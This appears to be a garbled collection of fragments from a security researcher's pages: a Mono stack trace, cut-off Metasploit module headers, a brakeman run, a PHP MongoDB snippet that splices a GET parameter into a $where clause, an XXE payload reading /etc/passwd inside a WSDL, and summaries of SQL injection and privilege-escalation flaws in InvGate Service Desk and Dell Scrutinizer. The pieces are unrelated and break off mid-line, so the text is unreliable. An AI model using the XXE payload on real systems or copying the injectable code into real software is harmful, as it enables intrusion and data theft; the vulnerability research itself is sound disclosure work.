at Mono.CSharp.CSharpCodeCompiler.CompileFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00135] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:236
at Mono.CSharp.CSharpCodeCompiler.CompileAssemblyFromFileBatch (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00011] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/Microsoft.CSharp/CSharpCodeCompiler.cs:135
at System.CodeDom.Compiler.CodeDomProvider.CompileAssemblyFromFile (System.CodeDom.Compiler.CompilerParameters options, System.String[] fileNames) [0x00014] in /private/tmp/source/bockbuild-mono-3.2.6/profiles/mono-mac-xamarin/build-root/mono-3.2.6/mcs/class/System/System.CodeDom.Compiler/CodeDomProvider.cs:111
at System.Web.Compilation.AssemblyBuilder.BuildAssembly (System.Web.VirtualPath virtualPath, System
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
bperry@w00den-pickle:~/tmp/discourse$ brakeman
WARNING: --------------------------------------------------------------------------
You are running an old version of bundler, please update by running: gem install bundler
Loading scanner...
[Notice] Detected Rails 3 application
Processing application in /home/bperry/tmp/discourse
Processing gems...
Processing configuration...
<?php
$m = new MongoClient("mongodb://127.0.0.1:27017");
$m->selectDB('foo');
$collection = $m->selectCollection('test', 'phpmanual');
if ($_GET["age"] != "") {
    $js = 'function(){if(this.name == "Joe"||this.age=='.$_GET["age"].')return true;}';
    $cursor = $collection->find(array('$where' => $js));
    foreach($cursor as $doc) {
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
  Rank = GoodRanking
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
xmlns:tns="http://www.webserviceX.NET/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:s="http://www.w3.org/2001/XMLSchema"
xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
targetNamespace="http://www.webserviceX.NET/"
bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ | |
InvGate Service Desk v4.2.36 multiple vulnerabilities
http://www.invgate.com/en/service-desk/
http://www.invgate.com/en/service-desk/on-premise-trial/
InvGate Service Desk suffers from many SQL injections that are reachable by an authenticated but
non-privileged (end-user role) user. Most are also stacked injections, so an attacker can also
modify any of the data in the database. The payloads used to determine exploitability are in the
sqlmap payload output, but each was verified to be able to enumerate the current database,
current user, and an assortment of other things. These were tested with an ‘end-user’ user.
Dell Scrutinizer 11.01 several vulnerabilities
http://www.mysonicwall.com has a trial available.
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can lead to
remote code execution. An attacker needs to be authenticated, but not as an administrator.
However, that wouldn’t stop anyone, since there is also a privilege escalation vulnerability:
any authenticated user can change any other user’s password, including the admin’s. One SQL
injection, for which a Metasploit module was provided, requires this privilege escalation to reach,
since it exists in the new user mechanism only available to admins.